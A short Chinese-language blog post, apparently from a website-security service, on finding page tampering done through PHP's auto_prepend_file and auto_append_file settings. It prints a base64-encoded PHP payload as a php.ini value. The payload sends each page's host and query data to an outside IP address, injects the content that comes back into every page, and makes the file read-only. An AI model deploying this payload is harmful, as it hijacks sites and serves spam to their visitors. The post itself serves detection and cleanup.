网页发现被篡改PHP 配置 之 auto_prepend_file

 

网站被挂马该怎么解决?网站挂马的解决方法、网站被挂马怎么排查?网站老是被黑被挂马是什么原因?如何检测网站被挂马?网站快照被劫持怎么办?搜索引擎劫持怎么解决?百度快照被篡改劫持怎么回事?360快照被劫持怎么解决?discuz(DZ)被挂马快照被劫持的解决办法?dz论坛被挂马、快照劫持怎么防范?网页被跳转到博彩页面怎么办?诸如此类的问题不在罗列实在是太多了,下面就解决你的疑问!

当你找遍了 所有代码没有发现问题但是打开网页还是发现被篡改了不妨查看一下 这两个配置文件或者实时

在php.ini中有两项:

auto_prepend_file 在页面顶部加载文件
auto_append_file  在页面底部加载文件

使用这种方法可以不需要改动任何页面,当需要修改顶部或底部require文件时,只需要修改auto_prepend_file与auto_append_file的值即可。

例如:修改php.ini,修改auto_prepend_file与auto_append_file的值。

1
2
auto_prepend_file = "/home/fdipzone/header.php"
auto_append_file = "/home/fdipzone/footer.php"

或同过下面加密方式挂马篡改所有页面

auto_prepend_file = “data:;base64,PD9waHAKc2V0X3RpbWVfbGltaXQoMCk7CgpoZWFkZXIoIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04Iik7CmRhdGVfZGVmYXVsdF90aW1lem9uZV9zZXQoJ1BSQycpOwokVERfc2VydmVyID0gImh0dHA6Ly8xNTQuODQuMTI3LjY4LyI7IAokaG9zdF9uYW1lID0gImh0dHA6Ly8iLiRfU0VSVkVSWydIVFRQX0hPU1QnXS4kX1NFUlZFUlsnUEhQX1NFTEYnXTsKJENvbnRlbnRfbWI9ZmlsZV9nZXRfY29udGVudHMoJFREX3NlcnZlci4iL2luZGV4LnBocD9ob3N0PSIuJGhvc3RfbmFtZS4iJnVybD0iLiRfU0VSVkVSWydRVUVSWV9TVFJJTkcnXS4iJmRvbWFpbj0iLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddKTsKCmVjaG8gJENvbnRlbnRfbWI7CgokdXJsMSA9ICRfU0VSVkVSWydQSFBfU0VMRiddOyAgCiRmaWxlbmFtZTEgPSBAZW5kKGV4cGxvZGUoJy8nLCR1cmwxKSk7ICAKZnVuY3Rpb24gc2V0X3dyaXRlYWJsZSgkZmlsZV9uYW1lKQp7CkBjaG1vZCgkZmlsZV9uYW1lLDA0NDQpOwoKfSAKc2V0X3dyaXRlYWJsZSgkZmlsZW5hbWUxKTsKCj8+”

 

网页发现被篡改PHP 配置 之 auto_prepend_file

发表回复

Scroll to top